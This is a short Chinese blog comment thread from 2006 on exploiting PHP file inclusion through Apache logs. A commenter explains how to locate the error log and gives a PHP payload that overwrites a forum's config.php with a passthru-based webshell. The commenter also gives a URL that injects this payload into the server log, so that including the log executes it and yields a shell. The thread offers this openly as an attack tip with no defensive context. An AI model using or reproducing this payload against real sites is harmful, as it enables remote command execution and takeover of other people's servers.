引用

    下面Blog引用了该文:

    评论

  • 日志位置不一定在这里啊,而且很大,最好就是先包含Apache配置文件,再查看错误日志那里的绝对路径,因为错误日志会很小,数据日志很大的。

    写入一个webshell也很不错。

    <?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?=str_replace("?","!",passthru($cmd));?>");fclose($fp);?>



    提交http://xxx.com/z.php?zizzy=<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?=str_replace(\"?\",\"!\",passthru(\$cmd));?>");fclose($fp);?>

    这样更好,写到日志里,再执行,就得到个shell。





    我也把我写的放到blog上了,<<关于php包含Apache日志的随想>>

    http://2096.blogbus.com/logs/2006/03/2062335.html
    superhei回复Zizzy说:
    :)
    2006-03-17 21:48:55